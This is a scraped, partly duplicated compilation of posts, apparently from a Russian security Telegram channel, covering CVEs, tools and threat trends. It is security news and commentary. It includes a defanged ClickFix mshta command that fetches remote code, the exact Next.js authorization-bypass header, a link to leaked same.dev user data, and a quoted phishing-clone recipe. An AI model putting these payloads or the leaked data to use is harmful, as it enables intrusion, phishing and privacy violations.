crackme - как много в этом слове. По крайней мере было раньше. Статьи в Хакере, примеры решения в спираченой IDA Pro и прочее красноглазие.
Но для тех, кто ещё не едет в шесть утра на другой конец города за гречкой по скидке надо дать небольшое объяснение: crackme - небольшие программы, написанные для отработки навыков и\или соревнований среди реверсеров. Часто они писались на низкоуровневых C и Assembly, но встречались примеры и на С++. Сейчас же можно встретить Rust, Lua и даже GdScript.
Для тех, кто готов предаваться ностальгии или пощупать что-то новое есть - crackmy.app. На выбор больше 4 тысяч сrackmes (часть из которых с решением), некоторые людям в теме могут быть даже знакомы.
Для желающих погрузиться можно начать с Hack This Game (GdScript) или сразу пуститься во все тяжкие с Terry Davis (Assembly).Ставь лайк, если понял отсылку, или что там блогеры говорят.
Но для тех, кто ещё не едет в шесть утра на другой конец города за гречкой по скидке надо дать небольшое объяснение: crackme - небольшие программы, написанные для отработки навыков и\или соревнований среди реверсеров. Часто они писались на низкоуровневых C и Assembly, но встречались примеры и на С++. Сейчас же можно встретить Rust, Lua и даже GdScript.
Для тех, кто готов предаваться ностальгии или пощупать что-то новое есть - crackmy.app. На выбор больше 4 тысяч сrackmes (часть из которых с решением), некоторые людям в теме могут быть даже знакомы.
Для желающих погрузиться можно начать с Hack This Game (GdScript) или сразу пуститься во все тяжкие с Terry Davis (Assembly).
CrackMy.App
CrackMy.App - Share and Solve Crackmes
Join the community to share your crackmes and solve challenges from other users.
Forwarded from SecOps среди берёз
Шёл 2025 год, а люди продолжают насиловать карликов делать из Raspberry Pi Pico логические анализаторы. В отличии от Scoop тут уже не 8 каналов, а 24 (заявлено до 120). Но разумеется, работает это всё не с голой Pico, или минимальной обвязкой, как было с тем же Scoop, а со своей платой и левел шифтером на TXU0104.
Без мобильного приложения, но и без платной подписки.
Сами платы можно заказать на PCBWay (если знаете, как обходить ограничения), или попробовать заказать у условного Резонита.
Так же можно заказать готовое устройство, но вопрос оплаты и доставки в РФ открыт.
Герберы/BOM/прошивки/софт можно забрать на:
Github / Mega
Исходники проекта открыты и доступны на Github.
Github: logicanalyzer
Github: logicanalyzer Wiki
Без мобильного приложения, но и без платной подписки.
Сами платы можно заказать на PCBWay (если знаете, как обходить ограничения), или попробовать заказать у условного Резонита.
Так же можно заказать готовое устройство, но вопрос оплаты и доставки в РФ открыт.
Герберы/BOM/прошивки/софт можно забрать на:
Github / Mega
Исходники проекта открыты и доступны на Github.
Github: logicanalyzer
Github: logicanalyzer Wiki
YouTube
Make a 100MHz 24 Channel Logic Analyser from your favorite Raspberry Pi Pico
Thanks PCBWay for sponsoring this video - https://pcbway.com/g/i8683S - Use this link for $5 new user free credit.
In this video you will learn how to setup the Raspberry Pi Pico so it can be used as a 24 channel signal analyzer. You will also see some examples…
In this video you will learn how to setup the Raspberry Pi Pico so it can be used as a 24 channel signal analyzer. You will also see some examples…
Тут у Лукацкого появился пост, что HackerOne поломали, креды утекли и вообще всё пропало.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.
🎉1
OWASP Project прирос ещё одним проектом - faction.
faction - платформа совместной работы для пентестеров и внутренних команд security-инженеров (но скорей больше для первых).
Что по функционалу:
- Ведение лога проверки в одном месте (с уязвимостями, заметками, чек-листами)
- Автоматизация генерирования отчётов
- Отслеживание устранения уязвимостей с алертами и SLA
- Для веберов есть плагин для Burp: Faction-Burp
- REST API для интеграции с другими инструментами
- При желании можно прикрутить аутентификацию через LDAP или OAuth
Можно запустить в docker:
Github: faction
faction Docs
OWASP: Faction
faction - платформа совместной работы для пентестеров и внутренних команд security-инженеров (но скорей больше для первых).
Что по функционалу:
- Ведение лога проверки в одном месте (с уязвимостями, заметками, чек-листами)
- Автоматизация генерирования отчётов
- Отслеживание устранения уязвимостей с алертами и SLA
- Для веберов есть плагин для Burp: Faction-Burp
- REST API для интеграции с другими инструментами
- При желании можно прикрутить аутентификацию через LDAP или OAuth
Можно запустить в docker:
git clone git@github.com:factionsecurity/faction.git
cd faction
docker-compose up --build
Github: faction
faction Docs
OWASP: Faction
GitHub
GitHub - factionsecurity/faction: Pen Test Report Generation and Assessment Collaboration
Pen Test Report Generation and Assessment Collaboration - factionsecurity/faction
Попался мне на глаза проект - CVSS-Threat Enhanced (CVSS-TE) Vulnerability Lookup
В чём суть: хоть у нас есть CVSS Base, CVSS-BT и EPSS, для приоритизации этого может быть недостаточно. Но для этого можно использовать модификатор на основе разных индикаторов, вроде CISA KEV или VulnCheck KEV, чтобы получился т.н Threat-enhanced scoring. Выглядит нагромождением, но задумка интересная.
Саму идею стоит полностью в репозитории на Github почитать, а ниже приведу часть размышлений автора:
Пример с CVE-2024-50302 может быть не совсем показателен, так как требуется физический доступ к устройству. Но сама идея интересная.
Ещё бы API к ней.
CVSS-Threat Enhanced (CVSS-TE) Vulnerability Lookup
Github.com: cvss-te
В чём суть: хоть у нас есть CVSS Base, CVSS-BT и EPSS, для приоритизации этого может быть недостаточно. Но для этого можно использовать модификатор на основе разных индикаторов, вроде CISA KEV или VulnCheck KEV, чтобы получился т.н Threat-enhanced scoring. Выглядит нагромождением, но задумка интересная.
Саму идею стоит полностью в репозитории на Github почитать, а ниже приведу часть размышлений автора:
Я наткнулся на интересный случай, он показывает, как традиционные системы оценки уязвимостей могут оказаться неэффективными при при определении приоритетности уязвимостей, которые активно эксплуатируются.
Уязвимость: CVE-2024-50302
Эта уязвимость была добавлена 3/4/2025 в каталог KEV (Known Exploited Vulnerabilities) но если бы вы смотрели на стандартные метрики, вы бы, вероятно, не стали определять ее приоритетность:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT (с Temporal Metric): 5,5 (MEDIUM)
EPSS Score: 0,18% (крайне низкая вероятность эксплуатации).
Но вот что самое интересное - несмотря на эти показатели, данная уязвимость активно эксплуатируется in the wild.
Почему стандартные метрики уязвимостей подводят нас:
Я давно разочаровался в управлении уязвимостями, и этот пример затрагивает три проблемы, которые я постоянно вижу:
- Статические оценки: Базовые оценки CVSS застыли во времени, независимо от того, что происходит в реальном мире.
- Временные ограничения: Даже CVSS-BT (Base+Temporal) часто не очень хорошо отражает реальную активность эксплуатации.
- Вероятность против реальности: EPSS отлично подходит для статистической вероятности, но может пропустить целевые эксплойты.
В качестве дополнительного проекта я работаю над усовершенствованным алгоритмом оценки алгоритмом, который включает в себя источники информации об угрозах, чтобы обеспечить более практичную оценку риска. Я назвал его CVSS-TE.
Для этой конкретной уязвимости вот что она показала:
До добавления CISA KEV:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT: 5.5 (MEDIUM)
CVSS-TE: 7.0 (HIGH) - повышение благодаря данным VulnCheck KEV.
Индикаторы: VulnCheck KEV
После добавления CISA KEV:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT: 5.5 (MEDIUM)
CVSS-TE: 7.5 (HIGH) - Дальнейшее повышение
Индикаторы: CISA KEV + VulnCheck KEV
Техническая реализация
Алгоритм:
Использует стандартную оценку CVSS-BT в качестве базовой.
Применяет множитель качества, основанный на данных о надежности и эффективности эксплойтов
Добавляет коэффициенты анализа угроз из различных источников (CISA KEV, VulnCheck, EPSS, количество эксплойтов).
Используется взвешенная формула для предотвращения разбавления высококачественных эксплойтов.
Основная формула такова: CVSS-TE = min(10, CVSS-BT_Score * Quality_Multiplier + Threat_Intel_Factor - Time_Decay).
Факторы Threat intel взвешиваются примерно следующим образом:
Наличие CISA KEV: +1.0
VulnCheck KEV presence: +0.8
Высокий уровень EPSS (≥0,5): +0.5
Наличие нескольких источников эксплойтов: +0,25 - +0,75 в зависимости от количества
Интересная часть
Что делает эту уязвимость особенно интересной, так это контраст между ее оценкой EPSS (0,18%, что ничтожно мало) и тем фактом, что что она активно эксплуатируется. Это именно тот случай, который вероятностные модели могут пропустить.
Для меня это подтверждение того, что дополнение традиционных оценок реальными данными об угрозах, можно выявить то, что в противном случае могло бы ускользнуть от внимания.
Пример с CVE-2024-50302 может быть не совсем показателен, так как требуется физический доступ к устройству. Но сама идея интересная.
Ещё бы API к ней.
CVSS-Threat Enhanced (CVSS-TE) Vulnerability Lookup
Github.com: cvss-te
GitHub
GitHub - kston83/cvss-te: Improves vulnerability prioritization by enhancing CVSS scores with exploit intelligence. Combines data…
Improves vulnerability prioritization by enhancing CVSS scores with exploit intelligence. Combines data from CISA KEV, EPSS, Metasploit, and other sources to create actionable severity ratings that...
3 февраля Google Security Team опубликовали информацию о уязвимости в некоторых процессорах AMD Zen (Zen 1 - Zen4), которая позволяет злоумышленнику с привилегиями локального администратора загружать вредоносные патчи.
PoС из дисклоза.
За дисклозом вышла статья - Zen and the Art of Microcode Hacking, с подробным описанием как самого микрокода, так и обхода проверки.
А для особо любопытствующих, в репе Google Security Team доступен инструмент для работы с микрокодом - zentool.
Информация о CVE:
NIST: CVE-2024-56161
AMD: AMD SEV Confidential Computing Vulnerability
PoС из дисклоза.
За дисклозом вышла статья - Zen and the Art of Microcode Hacking, с подробным описанием как самого микрокода, так и обхода проверки.
А для особо любопытствующих, в репе Google Security Team доступен инструмент для работы с микрокодом - zentool.
Информация о CVE:
NIST: CVE-2024-56161
AMD: AMD SEV Confidential Computing Vulnerability
GitHub
AMD: Microcode Signature Verification Vulnerability
### Summary
Google Security Team has identified a security vulnerability in some AMD Zen-based CPUs. This vulnerability allows an adversary with local administrator privileges (ring 0 from outside...
Google Security Team has identified a security vulnerability in some AMD Zen-based CPUs. This vulnerability allows an adversary with local administrator privileges (ring 0 from outside...
Ещё немного фидов с уязвимостями - fedisecfeeds.
Минималистично, но есть что нужно: сами CVE с CVSS, EPSS, ссылки на детекторы, эксплоиты и PoC, а так же ссылка на шаблон nuclei (если такой имеется).
А ещё можно получать фид в виде json.
Минималистично, но есть что нужно: сами CVE с CVSS, EPSS, ссылки на детекторы, эксплоиты и PoC, а так же ссылка на шаблон nuclei (если такой имеется).
А ещё можно получать фид в виде json.
🔥1
Bettercap on Android: A Portable Network Security Toolkit
Bettercap на Android это не только весело, но и красиво. И портативно, разумеется (не считая торчащих антенн и донглов на OTG).
Можно использовать Nethunter, но для сильных духом есть другой путь - собрать всё самому.
Потребуется:
- Смартфон с Android (рутованый)
- Termux (не с Google Play, a с F-Droid или Github)
Так же есть смысл поставить ядро NetHunter, но это опционально.
Если вам нечем занять свои выходные, у меня для вас хороший вариант.
Bettercap на Android это не только весело, но и красиво. И портативно, разумеется (не считая торчащих антенн и донглов на OTG).
Можно использовать Nethunter, но для сильных духом есть другой путь - собрать всё самому.
Потребуется:
- Смартфон с Android (рутованый)
- Termux (не с Google Play, a с F-Droid или Github)
Так же есть смысл поставить ядро NetHunter, но это опционально.
Если вам нечем занять свои выходные, у меня для вас хороший вариант.
Mobile Hacker
Bettercap on Android: A Portable Network Security Toolkit
This setup is not only lightweight and portable but also ensures that a pentester can operate in plain sight, appearing as just another person on their phone. In this guide, we'll show you how to install, configure, and use bettercap on Android, unlocking…
Build a $23 Wi-Fi Pineapple in 6 Minutes
Шёл 2025 год, а люди продолжают делать Wi-Fi Pineapple по дендро-фекальной методике. За многие годы процесс изменился не сильно: нас ожидает старый добрый OpenWRT и недорогие mips\mipsel роутеры.
Под капотом у нас не кастомная прошивка, а порт с оригинального Pineapple на базе OpenWRT v19.07.7. В списке "поддерживаемых" устройств указано 211 штук (данные с OpenWRT) , однако со статусом Available - 85. Если соберетесь собирать себе, лучше сверится со списком. Для ряда устройств есть уже готовые билды прошивок.
Но сам порт тоже не копирование 1:1 и некоторые изменения произошли и там:
Новый репозиторий модулей.
Обновлен репозиторий пакетов.
Проверены и исправлены зависимости
Обновлён Web-UI
Несколько новых модулей, которые необходимы для работы с подобными устройствами, вроде PMKIDAttack и Terminal.
В принципе, на выходе получается готовое устройство, но это всё ещё старый Wi-Fi Pineapple на OpenWRT v19.07.7.
Github: wifi-pineapple-cloner
Gitlab: wifi-pineapple-cloner-builds
Шёл 2025 год, а люди продолжают делать Wi-Fi Pineapple по дендро-фекальной методике. За многие годы процесс изменился не сильно: нас ожидает старый добрый OpenWRT и недорогие mips\mipsel роутеры.
Под капотом у нас не кастомная прошивка, а порт с оригинального Pineapple на базе OpenWRT v19.07.7. В списке "поддерживаемых" устройств указано 211 штук (данные с OpenWRT) , однако со статусом Available - 85. Если соберетесь собирать себе, лучше сверится со списком. Для ряда устройств есть уже готовые билды прошивок.
Но сам порт тоже не копирование 1:1 и некоторые изменения произошли и там:
Новый репозиторий модулей.
Обновлен репозиторий пакетов.
Проверены и исправлены зависимости
Обновлён Web-UI
Несколько новых модулей, которые необходимы для работы с подобными устройствами, вроде PMKIDAttack и Terminal.
В принципе, на выходе получается готовое устройство, но это всё ещё старый Wi-Fi Pineapple на OpenWRT v19.07.7.
Github: wifi-pineapple-cloner
Gitlab: wifi-pineapple-cloner-builds
YouTube
Build a $23 Wi-Fi Pineapple in 6 Minutes — EASIEST Method! [Pt. I]
The _easiest_ method to convert your router to Hak5's Wi-Fi Pineapple Tetra ― every single time.
PCBWay's big 50% OFF Christmas sale: https://www.pcbway.com/activity/christmas2024.html
*McShuriken's Cyber-Ninja Shop:* https://shurikenhacks.com
*Instagram:*…
PCBWay's big 50% OFF Christmas sale: https://www.pcbway.com/activity/christmas2024.html
*McShuriken's Cyber-Ninja Shop:* https://shurikenhacks.com
*Instagram:*…
Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication
Начните своё утро с чашки крепкого CVSS 9.8 в Ingress NGINX Controller для Kubernetes.
Набор уязвимостей (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098 и CVE-2025-1974) получил общее кодовое название IngressNightmare. Стоит отметить, что эти недостатки не затрагивают NGINX Ingress Controller, который является еще одной реализацией контроллера Ingress для NGINX и NGINX Plus.
Коротко о уязвимостях:
- CVE-2025-24513 (CVSS: 4,8) — уязвимость, связанная с неправильной проверкой входных данных, которая может привести к directory traversal внутри контейнера, что приведет к отказу в обслуживании (DoS) или ограниченному раскрытию секретных объектов из кластера в сочетании с другими уязвимостями.
- CVE-2025-24514 (CVSS: 8,8) — аннотация Ingress auth-url может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1097 (CVSS: 8,8) — аннотация Ingress auth-tls-match-cn может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1098 (CVSS: 8,8) — аннотации Mirror-Target и Mirror-Host Ingress могут использоваться для внедрения произвольной конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера Ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1974 (CVSS: 9,8) — неаутентифицированный злоумышленник, имеющий доступ к сети модулей, может выполнить произвольный код в контексте контроллера ingress-nginx при определенных условиях.
Wiz выпустили детальную статью IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX с подробным описанием работы уязвимости, а так же процессом детекта и митигации.
Начните своё утро с чашки крепкого CVSS 9.8 в Ingress NGINX Controller для Kubernetes.
Набор уязвимостей (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098 и CVE-2025-1974) получил общее кодовое название IngressNightmare. Стоит отметить, что эти недостатки не затрагивают NGINX Ingress Controller, который является еще одной реализацией контроллера Ingress для NGINX и NGINX Plus.
Коротко о уязвимостях:
- CVE-2025-24513 (CVSS: 4,8) — уязвимость, связанная с неправильной проверкой входных данных, которая может привести к directory traversal внутри контейнера, что приведет к отказу в обслуживании (DoS) или ограниченному раскрытию секретных объектов из кластера в сочетании с другими уязвимостями.
- CVE-2025-24514 (CVSS: 8,8) — аннотация Ingress auth-url может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1097 (CVSS: 8,8) — аннотация Ingress auth-tls-match-cn может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1098 (CVSS: 8,8) — аннотации Mirror-Target и Mirror-Host Ingress могут использоваться для внедрения произвольной конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера Ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1974 (CVSS: 9,8) — неаутентифицированный злоумышленник, имеющий доступ к сети модулей, может выполнить произвольный код в контексте контроллера ingress-nginx при определенных условиях.
Wiz выпустили детальную статью IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX с подробным описанием работы уязвимости, а так же процессом детекта и митигации.
wiz.io
CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog
Wiz Research uncovered RCE vulnerabilities (CVE-2025-1097, 1098, 24514, 1974) in Ingress NGINX for Kubernetes allowing cluster-wide secret access.
Doing the Due Diligence: Analyzing the Next.js Middleware Bypass (CVE-2025-29927)
А вот и разбор CVE-2025-29927 подоспел.
Коротко о CVE-2025-29927: критическая уязвимость в Next.js, которая позволяет обойти проверки авторизации, что связанно с неправильной обработкой заголовков
Для обхода защиты достаточно добавить HTTP-заголовок:
Проблема затрагивает версии с 11.1.4 по 15.2.2.
PoC:
Github: aydinnyunus/CVE-2025-29927
NIST: CVE-2025-29927
Github Advisory Database: CVE-2025-29927
Next.js Blog: CVE-2025-29927
А вот и разбор CVE-2025-29927 подоспел.
Коротко о CVE-2025-29927: критическая уязвимость в Next.js, которая позволяет обойти проверки авторизации, что связанно с неправильной обработкой заголовков
x-middleware-subrequest внутри middleware.Для обхода защиты достаточно добавить HTTP-заголовок:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Проблема затрагивает версии с 11.1.4 по 15.2.2.
PoC:
Github: aydinnyunus/CVE-2025-29927
NIST: CVE-2025-29927
Github Advisory Database: CVE-2025-29927
Next.js Blog: CVE-2025-29927
Searchlight Cyber
Analyzing Next.js Middleware Bypass (CVE-2025-29927) | SearchlightCyber
This critical vulnerability allowed attackers to bypass authentication implemented in the middleware layer. With the popularity of this framework on the internet and within our customers' attack surfaces, our Security Research team took a deeper look at the…
Cult Of Wire
Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication Начните своё утро с чашки крепкого CVSS 9.8 в Ingress NGINX Controller для Kubernetes. Набор уязвимостей (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098 и CVE…
К IngressNightmare появился PoC + Detect c очередным разбором патча и уязвимости.
Так же для детекта можно использовать шаблон nuclei.
Так же для детекта можно использовать шаблон nuclei.
ShakeyLabs
IngressNightmare Patch and Vulnerability Analysis
Series of CVEs assigned to ingress-nginx
GitHub - kubernetes/ingress-nginx: Ingress NGINX Controller for KubernetesIngress NGINX Controller for Kubernetes. Contribute to kubernetes/ingress-nginx development by creating an account on GitHub.GitHubkubernetes…
GitHub - kubernetes/ingress-nginx: Ingress NGINX Controller for KubernetesIngress NGINX Controller for Kubernetes. Contribute to kubernetes/ingress-nginx development by creating an account on GitHub.GitHubkubernetes…
На днях у сервиса same.dev (инструмент позволяющий копировать UI сайтов) через публичный API утекли данные пользователей. В утечку попали данные о каждом проекте, созданном на сайте, а также email и полное имя авторов.
Всего утекло 8635 уникальных email и ~10,000 промптов.
Но больший интерес составляет не столько пользовательская информация, сколько промпты. Пользователи копируют Facebook, Youtube, Vercel, Notion и даже wiz.io.
В принципе это не было проблемой, но same.dev используется как готовый инструмент для скама\фишинга. Он не просто может скопировать UI, но и заботливо развернет это на netlify. Местами выглядит криво (например логотипы), но в целом вполне похоже.
Примеры:
- Youtube clone - same-pfp9vkh5swx-latest.netlify \ Project
- Facebook clone - same-ybse3t7n0a1-latest.netlify \ Project
- Yandex clone - same-9seosekvpxr-latest.netlify \ Project
Сэмлп на 100 записей: files.catbox.moe/xi2xq7.json
FREE PHISHING PAGE GENRATOR 100% ACCURATE
- STEP 1 GOT TO same.dev
- STEP 2 PASTE THE LINK ON THE BAR
- BOOM U GOT THE EXACT CLONE OF THE WEBPAGE
Всего утекло 8635 уникальных email и ~10,000 промптов.
Но больший интерес составляет не столько пользовательская информация, сколько промпты. Пользователи копируют Facebook, Youtube, Vercel, Notion и даже wiz.io.
В принципе это не было проблемой, но same.dev используется как готовый инструмент для скама\фишинга. Он не просто может скопировать UI, но и заботливо развернет это на netlify. Местами выглядит криво (например логотипы), но в целом вполне похоже.
Примеры:
- Youtube clone - same-pfp9vkh5swx-latest.netlify \ Project
- Facebook clone - same-ybse3t7n0a1-latest.netlify \ Project
- Yandex clone - same-9seosekvpxr-latest.netlify \ Project
Сэмлп на 100 записей: files.catbox.moe/xi2xq7.json
- STEP 1 GOT TO
- STEP 2 PASTE THE LINK ON THE BAR
- BOOM U GOT THE EXACT CLONE OF THE WEBPAGE
Tunneling corporate firewalls for developers
Учимся тунеллировать трафик у разрабов (но не у всех) илихозяйке атакующему на заметку. А если без шуток, автор статьи как заправский редтимер показывает примеры тунеллирования с обходом фаерволла с использованием ssh и веб-сервера на одном порту (с применением sslh) , прокси (с применением ssh-connect, corkscrew и proxytunnel) и DPI (с применением openssl).
И то, что применимо для ssh, работает с scp/sftp и rsync.
Всё с примерами перехвата трафика (правда без самих pcap).
Можно конечно использовать ngrok, но это не так интересно.
Учимся тунеллировать трафик у разрабов (но не у всех) или
И то, что применимо для ssh, работает с scp/sftp и rsync.
Всё с примерами перехвата трафика (правда без самих pcap).
Можно конечно использовать ngrok, но это не так интересно.
Немного о трендах текущего времени.
Последние полгода (может даже чуть больше) были очень богаты на новости о инфостиллерах. Или современные злоумышленники обленились, или пользователи стали более доверчивы или менее внимательны. Но суть не только в этом. Если ранее под удар попадали работники крупных и не очень компаний, то сейчас и обычные люди могут представлять интерес для злоумышленников.
Кроме роста заражений особо новинок нет, распространение через почту и мессенджеры, а так же преимущественно заражается BYOD, а не корпоративное устройство.
Немного хайлайтов:
- NL Times - Info stealer computer viruses have stolen data from over 40,000 in the Netherlands
- Check Point Software - Infostealer attacks surged by 58%, revealing a maturing cyber ecosystem. Over 70% of infected devices were personal, as threat actors targeted bring-your-own device (BYOD) environments to breach corporate resources
- Hudson Rock - The landscape of cyber threats has been shifting dramatically in recent years, with a notable transition from traditional botnets to a more insidious form of malware: Infostealers. Cybercriminals now favor Infostealers for their efficiency and profitability.
- Huntress - Infostealers aren’t just a passing trend—they’re a cornerstone of modern cyber threats, driving nearly a quarter (24%) of all cyber incidents in 2024
- Recorded Future - Credentials are frequently stolen by information-stealing malware, or infostealers, that are built to target a variety of operating systems and mobile devices. Credential theft per device has risen 25% since 2021
- CrowdStrike - Abusing valid accounts has become the primary initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024, one likely initial access mechanism is leveraging information stealers; during 2024, threat actors updated Stealc and Vidar to target cloud accounts
- SpyCloud - The rapid rise of malware, specifically infostealers, is one of the biggest trends we continue to observe. In 2023 alone, infostealer malware use tripled. We saw stealers skyrocket in our recaptured data, with as many as 1 in 5 people already the victims of an infostealer infection
- Sophos - Data theft is the focus of most malware targeting small and medium businesses—password stealers, keyboard loggers, and other spyware made up nearly half of malware detections
- Mandiant - We anticipate the use of stolen credentials to persist into 2025, with infostealers continuing to serve as a primary vector to obtain them
- Hudson Rock - StreamElements, a popular cloud-based streaming platform, has confirmed a significant data breach involving a third-party service provider, following reports of stolen data being offered for sale on a hacking forum
- Hudson Rock - Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log
Нельзя обойти стороной работающих по ruособям лицам, активно распространяющие apk в Telegram. Метод топорный, но работающий.
Так что не забывайте прокачивать Security Awareness, как свой, так и окружающих вас лиц. И коллег.Может перестанут вас окружать.
И небольшая инфографика от Hudson Rock.
Последние полгода (может даже чуть больше) были очень богаты на новости о инфостиллерах. Или современные злоумышленники обленились, или пользователи стали более доверчивы или менее внимательны. Но суть не только в этом. Если ранее под удар попадали работники крупных и не очень компаний, то сейчас и обычные люди могут представлять интерес для злоумышленников.
Кроме роста заражений особо новинок нет, распространение через почту и мессенджеры, а так же преимущественно заражается BYOD, а не корпоративное устройство.
Немного хайлайтов:
- NL Times - Info stealer computer viruses have stolen data from over 40,000 in the Netherlands
- Check Point Software - Infostealer attacks surged by 58%, revealing a maturing cyber ecosystem. Over 70% of infected devices were personal, as threat actors targeted bring-your-own device (BYOD) environments to breach corporate resources
- Hudson Rock - The landscape of cyber threats has been shifting dramatically in recent years, with a notable transition from traditional botnets to a more insidious form of malware: Infostealers. Cybercriminals now favor Infostealers for their efficiency and profitability.
- Huntress - Infostealers aren’t just a passing trend—they’re a cornerstone of modern cyber threats, driving nearly a quarter (24%) of all cyber incidents in 2024
- Recorded Future - Credentials are frequently stolen by information-stealing malware, or infostealers, that are built to target a variety of operating systems and mobile devices. Credential theft per device has risen 25% since 2021
- CrowdStrike - Abusing valid accounts has become the primary initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024, one likely initial access mechanism is leveraging information stealers; during 2024, threat actors updated Stealc and Vidar to target cloud accounts
- SpyCloud - The rapid rise of malware, specifically infostealers, is one of the biggest trends we continue to observe. In 2023 alone, infostealer malware use tripled. We saw stealers skyrocket in our recaptured data, with as many as 1 in 5 people already the victims of an infostealer infection
- Sophos - Data theft is the focus of most malware targeting small and medium businesses—password stealers, keyboard loggers, and other spyware made up nearly half of malware detections
- Mandiant - We anticipate the use of stolen credentials to persist into 2025, with infostealers continuing to serve as a primary vector to obtain them
- Hudson Rock - StreamElements, a popular cloud-based streaming platform, has confirmed a significant data breach involving a third-party service provider, following reports of stolen data being offered for sale on a hacking forum
- Hudson Rock - Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log
Нельзя обойти стороной работающих по ru
Так что не забывайте прокачивать Security Awareness, как свой, так и окружающих вас лиц. И коллег.
И небольшая инфографика от Hudson Rock.
CVE-2025-31115: XZ Utils Hit Again with High-Severity Multithreaded Decoder Bug
Скучали по уязвимостям в XZ Utils? Их есть у меня.
В новостях сегодня XZ Utils и снова CVE в нём: CVE-2025-31115 c CVSS: 8.7. CVE-2025-31115 затрагивает версии XZ Utils с 5.3.3alpha по 5.8.0, приводя к серьезной ошибке использования кучи после освобождения в ее многопоточном декодере, способной вызывать сбои или повреждение памяти, что приведет к непредсказуемому поведению программы или даже к возможности выполнения произвольного кода.
Исправление этой уязвимости уже вышло. Версия XZ Utils 5.8.1 устраняет эту ошибку. Исправление также было применено к веткам v5.4, v5.6, v5.8 и master репозитория xz Git.
Не так критично (да и EPSS пока 0.05), как CVE-2024-3094 (если кто забыл статьи на Wikipedia и Akamai), но лучше не затягивать с обновлением.
Скучали по уязвимостям в XZ Utils? Их есть у меня.
В новостях сегодня XZ Utils и снова CVE в нём: CVE-2025-31115 c CVSS: 8.7. CVE-2025-31115 затрагивает версии XZ Utils с 5.3.3alpha по 5.8.0, приводя к серьезной ошибке использования кучи после освобождения в ее многопоточном декодере, способной вызывать сбои или повреждение памяти, что приведет к непредсказуемому поведению программы или даже к возможности выполнения произвольного кода.
Исправление этой уязвимости уже вышло. Версия XZ Utils 5.8.1 устраняет эту ошибку. Исправление также было применено к веткам v5.4, v5.6, v5.8 и master репозитория xz Git.
Не так критично (да и EPSS пока 0.05), как CVE-2024-3094 (если кто забыл статьи на Wikipedia и Akamai), но лучше не затягивать с обновлением.
Daily CyberSecurity
CVE-2025-31115: XZ Utils Hit Again with High-Severity Multithreaded Decoder Bug
Learn about the XZ Utils vulnerability and its impact on data compression tools. Understand CVE-2025-31115 and its risks.
Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
Это настолько плохо, что даже хорошо.
Глупая, но рабочая схема развертывания малвари, о которой были новости в прошлом году, развернулась с новой силой и получила своё название - ClickFix.
В чём суть:
ClickFix имитирует привычную captcha, при нажатии на которую ждёт три замечательных шага:
- Открываем "Выполнить" (оно же Run) хоткеем Win + R
- Вставляем содержимое из буфера обмена
- Запускаем
Пример пейлоада:
Что получает пользователь?
- Подключение к С2
- Отключение логов
- Загрузка дополнительной нагрузки
- Закрепление
- Эксфильтрация данных.
MalwareBazaar Database: ClickFix
Medium - SquareX Labs: ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans
Это настолько плохо, что даже хорошо.
Глупая, но рабочая схема развертывания малвари, о которой были новости в прошлом году, развернулась с новой силой и получила своё название - ClickFix.
В чём суть:
ClickFix имитирует привычную captcha, при нажатии на которую ждёт три замечательных шага:
- Открываем "Выполнить" (оно же Run) хоткеем Win + R
- Вставляем содержимое из буфера обмена
- Запускаем
Пример пейлоада:
mshta hxxps[:]//join-to-12-homework[.]sbs/r2lkXFb7IXX2GSXp[.]html #'' I'm human ID216292''
Что получает пользователь?
- Подключение к С2
- Отключение логов
- Загрузка дополнительной нагрузки
- Закрепление
- Эксфильтрация данных.
MalwareBazaar Database: ClickFix
Medium - SquareX Labs: ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans
Proofpoint
ClickFix Malware & Social Engineering Threat Grows | Proofpoint US
Learn how the threat of ClickFix malware is spreading through social engineering. Find out how to protect yourself from these attacks with Proofpoint.
Supply chain сканер vet от safedep обзавёлся интеграцией с DefectDojo.
Как использовать:
1. Добавляем\используем нужный product-id
2. Запускаем vet
3. Наслаждаемся репортами
Пример запуска:
Есть небольшое демо работы.
Что за vet такой?
vet - это инструмент для защиты от атак на цепочки поставок ПО с открытым исходным кодом. Информация о уязвимостях из берётся из OSV, а для описания политик используется Common Expressions Language.
Функционал и особенности:
- Статус сопровождения пакета
- Соответствие расширенным атрибутам лицензии
- Управление рисками OSS на основе OpenSSF Scorecard
- Анализ прямых и транзитивных зависимостей
—
Github: vet
